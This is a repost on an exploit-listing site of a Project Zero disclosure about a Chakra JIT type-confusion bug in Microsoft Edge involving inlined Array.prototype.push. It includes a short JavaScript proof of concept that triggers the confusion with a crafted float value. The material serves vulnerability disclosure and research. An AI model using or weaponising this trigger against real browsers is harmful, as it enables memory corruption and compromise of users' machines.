Advertisement






Microsoft Edge Chakra JIT InlineArrayPush Type Confusion

CVE Category Price Severity
CVE-2019-0915 CWE-119 $100,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-08-17
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H 0.02168 0.42573

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080118

Below is a copy:

Microsoft Edge Chakra JIT InlineArrayPush Type Confusion
Microsoft Edge: Chakra: JIT: Type confusion with InlineArrayPush 




This is similar to <a href="/p/project-zero/issues/detail?id=1531" title="Microsoft Edge: Chakra: JIT: Magic value can cause type confusion" class="closed_ref" rel="nofollow"> issue 1531 </a>. The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for <a href="/p/project-zero/issues/detail?id=1531" title="Microsoft Edge: Chakra: JIT: Magic value can cause type confusion" class="closed_ref" rel="nofollow"> issue 1531 </a>.

PoC:
function opt(arr, value) {
arr.push(value);  // <--------
arr[0] = 2.3023e-320;
}

function main() {
    for (let i = 0; i < 0x10000; i++) {
let tmp = [1.1, 2.2, 3.3];
delete tmp[1];

        opt(tmp, 2.2);
    }

    let arr = [1.1];
    opt(arr, -5.3049894784e-314);  // MAGIC VALUE!

    alert(arr);
}

main();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: lokihardt

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.